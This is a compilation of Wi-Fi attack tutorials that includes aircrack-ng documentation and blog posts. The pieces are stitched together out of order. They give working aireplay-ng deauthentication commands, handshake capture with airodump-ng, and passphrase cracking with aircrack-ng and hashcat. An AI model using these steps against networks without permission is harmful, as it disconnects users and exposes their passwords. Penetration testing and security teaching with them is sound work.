Deauthentication

Description
This attack sends disassocate packets to one or more clients which are currently associated with a
particular access point. Disassociating clients can be done for a number of reasons:

 Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another
term for this is “cloaked”.
 Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
 Generate ARP requests (Windows clients sometimes flush their ARP cache when
disconnected)

Of course, this attack is totally useless if there are no associated wireless client or on fake
authentications.

Usage
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

 -0 means deauthentication
 1 is the number of deauths to send (you can send multiple if you wish); 0 means send
them continuously
 -a 00:14:6C:7E:40:80 is the MAC address of the access point
 -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted
then all clients are deauthenticated
 ath0 is the interface name

Usage Examples
Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the
following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Where:

 -0 means deauthentication
 1 is the number of deauths to send (you can send multiple if you wish)
 -a 00:14:6C:7E:40:80 is the MAC address of the access point
  -c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
 ath0 is the interface name

Here is typical output:

12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9

12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63
ACKs]

For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you
specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.

Here is what the “[ 61|63 ACKs]” means:

 [ ACKs received from the client | ACKs received from the AP ]

 You will notice that the number in the example above is lower then 64 which is the
number of packets sent. It is not unusual to lose a few packets. Conversely, if the client
was actively communicating at the time, the counts could be greater then 64.
 How do you use this information? This gives you a good indication if the client and or
AP heard the packets you sent. A zero value definitely tells the client and/or AP did not
hear your packets. Very low values likely indicate you are quite a distance and the signal
strength is poor.

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another
console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Explanation of the above:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0

Where:

 -c 6 is the channel to listen on

 –bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
 -w out is the file prefix of the file name to be written
 ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

 -0 means deauthentication attack

 5 is number of groups of deauthentication packets to send out
 -a 00:14:6C:7E:40:80 is MAC address of the access point
  -c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated
 ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c

00:0F:B5:AB:CB:9D ath0”

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another
console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests
with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type)
otherwise the card won't be correctly setup for injection.

Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be
physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting
Why does deauthentication not work?
There can be several reasons and one or more can affect you:

 You are physically too far away from the client(s). You need enough transmit power for
the packets to reach and be heard by the clients. If you do a full packet capture, each
packet sent to the client should result in an “ack” packet back. This means the client
heard the packet. If there is no “ack” then likely it did not receive the packet.
 Wireless cards work in particular modes such b, g, n and so on. If your card is in a
different mode then the client card there is good chance that the client will not be able to
 correctly receive your transmission. See the previous item for confirming the client
received the packet.
 Some clients ignore broadcast deauthentications. If this is the case, you will need to send
a deauthentication directed at the particular client.
 Clients may reconnect too fast for you to see that they had been disconnected. If you do a
full packet capture, you will be able to look for the reassociation packets in the capture to
confirm deauthentication worked.

General
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.

Disconnect devices from WiFi networks.

Deauthentication Attack using aireplay-ng
#cybersecurity #ethicalhacking #hacking #linux

Hello! In this post I will explain to you how to deauthenticate any device from a WiFi network
without beeing connected to the network itself!
Beware, this is illegal without permission, and it can be detected.

What you should know:

 Target Device MUST be connected to a WiFi network.

 The target device might switch to another WiFi network that's saved. Or use mobile data.
 You need a WiFi adapter that supports monitor mode. (I am using the Alfa
AWUS036ACH)

Data you need to perform the attack:

 The router its BSSID.

 The target device its MAC Address.

(Will be explained how to get this data.)

How it's done:

First you need to make sure that your adapter is in monitor mode (so it can start receiving
packets around you.)
You can check the mode of your adapter with $ iwconfig
If it's not in monitor mode yet you need to follow these steps:

 Disable your adapter $ ifconfig wlan1 down

 Change mode to monitor mode $ iwconfig wlan1 mode monitor
 Enable the adapter $ ifconfig wlan1 up
Now that your adapter is in monitor mode, it can receive all WiFi packets sent all around you
from different devices. (Even if you are not connected to the network, or if you don't have the
password of the network.)
What we need to do now, is intercept those packets. To intercept those packets we are using a
packet sniffer called airodump-ng.
This will allow us to collect data from nearby WiFi connections (such as the BSSID, Channel,
Encryption method) and even devices connected to the networks.

To use airodump-ng we can run the following command, and the given interface [wlan1] will
start collecting data.
$ airodump-ng wlan1
When you see the networks listed. You can use this information as a filter to collect data of a
specific network.
Now you can specify the bssid and channel of the network.
$ airodump-ng --bssid [NETWORK_BSSID] --channel [NETWORK_CHANNEL] wlan1

Optionally you can use --write [filename] in the command. This way you save the collected
packets in a file, which you could analyze further with wireshark.
Now we can see the devices connected to the network. (Listed under STATION)
Once you have the MAC Address of the target device, and the BSSID of the router. You have
enough information to start the deauthentication attack.

To start the deauthentication attack you can use the following command:
$ aireplay-ng --deauth 0 -a [ROUTER_BSSID] -c [TARGET_MAC_ADDRESS] wlan1

--deauth 0 means that you will send infinite deauthentication packets. It stops sending packets
whenever you stop the program from executing. (CTRL + C)
(NOTE: airodump-ng should be running with the bssid & channel specified simultaneously
with aireplay-ng! )
👋 Before you go

Reinvent your career. Join DEV.

# aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

In our previous blog post (Part 1) of the Wi-Fi Hacking series, we went through setting up our
Alfa card, decloaking hidden SSID’s, passively capturing handshakes and cracking the
passphrase using aircrack-ng. Here, we are going to perform an active deauth attack on a WPA-2
PSK Wi-Fi Network, capture the handshake and then try to crack the passphrase using hashcat.

We’ll start off by running airodump-ng on 2.4Ghz by using the ‘–band b’ option.

We can see a lot of wireless frames being captured.

We are going to target the AP with the ESSID of Wireless PT for our demonstration.

We’ll use airodump-ng again, this time with the -d, -c and -w flags to specify our AP MAC
address, the respective channel number and the output filename.
A client/STA is required to be connected to the target AP in order to perform active deauth
attacks. We can see that an STA is connected to our AP from the frames being captured by our
alfa card.

We’ll go through how a deauthentication attack works before actually performing it.

What is a Deauthentication (Deauth) Attack?

The IEEE 802.11 protocol contains the provision for a deauthentication management frame.
These management frames are not encrypted (except for IEEE 802.11w). This message indicates
that the sender wishes to terminate the wireless connection to the receiver. An attacker can spoof
the STA’s MAC address and send a deauthentication frame to the AP. This effectively
disconnects the STA from the AP. The STA tries to reconnect to the AP after a short while.
When this happens, we can capture the 4-way handshake and try to crack the passphrase. Now
that we have covered the theory in brief, we can move forward with the attack.

We can use aireplay-ng tool on a new terminal to send deauth frames as shown below.

The STA disconnects from the AP and reconnects after some time. Airodump captures the 4-way
handshake during reconnection.
We have successfully captured the 4-way handshake between the STA and AP. Now, we can
proceed to crack the passphrase. We’ll need hcxpcapngtool from hcxtools package to convert the
airodump-ng’s output .CAP file to that of hashcat’s 22000 mode. We can install hcxtools
package from Kali Linux’s default repo using the commands show below.

After installing the package, we can use hcxpcapng tool to convert our ‘wifi_deauth-01.cap’ file
to hashcat’s 22000 format.
We need to transfer the file to the host OS to utilize the GPU & download hashcat on the host
OS. For the word-list we will be reusing the one our previous blog.
We successfully demonstrated a WPA-2 Deauthentication attack and managed to crack the
passphrase too. We’ll get into other wireless attacks in upcoming blogs.

By partnering with Redfox Security, you’ll get the best security and technical skills required to
execute an effective and thorough penetration test. Our offensive security experts have years of
experience assisting organizations in protecting their digital assets through penetration testing
services. To schedule a call with one of our technical specialists, call 1-800-917-0850 now.

Redfox Security is a diverse network of expert security consultants with a global mindset and a
collaborative culture. If you are looking to improve your organization’s security posture, contact
us today to discuss your security testing needs. Our team of security professionals can help you
identify vulnerabilities and weaknesses in your systems and provide recommendations to
remediate them.

Wi-Fi stands for wireless network technology. It establishes wireless network connections using
radio waves. Malicious hackers frequently opt to penetrate firms by compromising their Wi-Fi
networks, mainly due to the nature of Wi-Fi and its methods for enabling network access.
Households are also at risk, owing to the proliferation of IoT-connected devices and appliances.

In Part 1 of the Wi-Fi Hacking series, we are going to delve into Wi-Fi hacking, specifically
on Wi-Fi network decloaking, capturing WPA handshakes and obtaining cleartext passphrase
using passive techniques (i.e., not performing de-authentication attacks). We will be using Kali
Linux in VirtualBox and a USB wireless adapter (Alfa AWUS036ACH which uses Realtek
RTL8812AU chipset) which can support monitor mode and packet injection.

We will be covering the following topics:

1. Configuring the Wireless Adapter

2. Discovering Nearby Wi-Fi Networks
3. Decloaking Hidden Wi-Fi Networks
4. Cracking the Passphrase

Configuring the Wireless Adapter

Before we get into the good stuff, we need to properly set up our Alfa card. First, we need to
pass through our wireless USB adapter to Kali Linux by configuring the Virtual Box settings.

Next, we boot up our Kali VM and install the respective wireless device driver. In our case we
install the realtek-rtl88xxau-dkms from the default kali repository using apt install command.
To check whether kali detects our wireless adapter, we can use the ‘iwconfig’ command.

We can see that the ‘wlan0’ interface is now active and that it’s in ‘managed’ mode.

To set our wireless adapter in ‘monitor’ mode, we can use the ‘airmon-ng’ tool. But before we
do that, we need to check whether there are any running processes which could cause problems
and kill them. This can be done by using ‘airmon-ng check kill’ command.

Now, we can set our wireless adapter to ‘monitor’ mode.

To verify whether our ‘wlan0’ interface is in ‘monitor’ mode, we can run ‘iwconfig wlan0’
command.

We have now successfully setup our wireless adapter. Next, we can move on to the attack phase.

Discovering Nearby Wi-Fi Networks

We will be using the aircrack-ng suite in this blog post. We can find nearby Wi-Fi networks by
using the ‘airodump-ng’ tool in Kali, along with specifying our interface name. Note that we are
not specifying any particular channel, so ‘airodump-ng’ will automatically switch between
channels.
We can see a lot of information being displayed on the terminal. Let’s go through each column to
understand what is being displayed.